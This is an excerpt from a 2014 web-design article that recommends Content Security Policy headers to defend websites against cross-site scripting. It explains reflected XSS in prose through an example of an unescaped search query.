By Nick Heath in Web Designer, December 1, 2014
Lessen the risk of falling victim to one of the biggest security threats on the web by using Content Security Policy headers on your website. Cross site scripting (XSS) is identified as one of the main threats to web users by the OWASP Foundation.
XSS occurs when a malicious third party injects a script into content served by your website. Sites that serve user-supplied content to the browser without validating or escaping that content are vulnerable to XSS.
For example, take a site that allows users to search for a term and returns their query alongside the result, e.g. 'You searched for cats'. If the site doesn't escape or validate the query 'cats' then it could be possible to insert a link after the query in the URL, for instance to a malicious JavaScript script hosted on another domain.
Other users could then be sent the malicious URL alongside a message saying 'Look at these cute cats' and, if they clicked on the link, the script would execute in their browser. This is an example of what is called a reflected attack, where data is read directly from the HTTP request and reflected back in the HTTP response.
Full Article
Login to the community
No account yet? Create an account
Enter your username or e-mail address. We'll send you an e-mail with instructions to reset your password.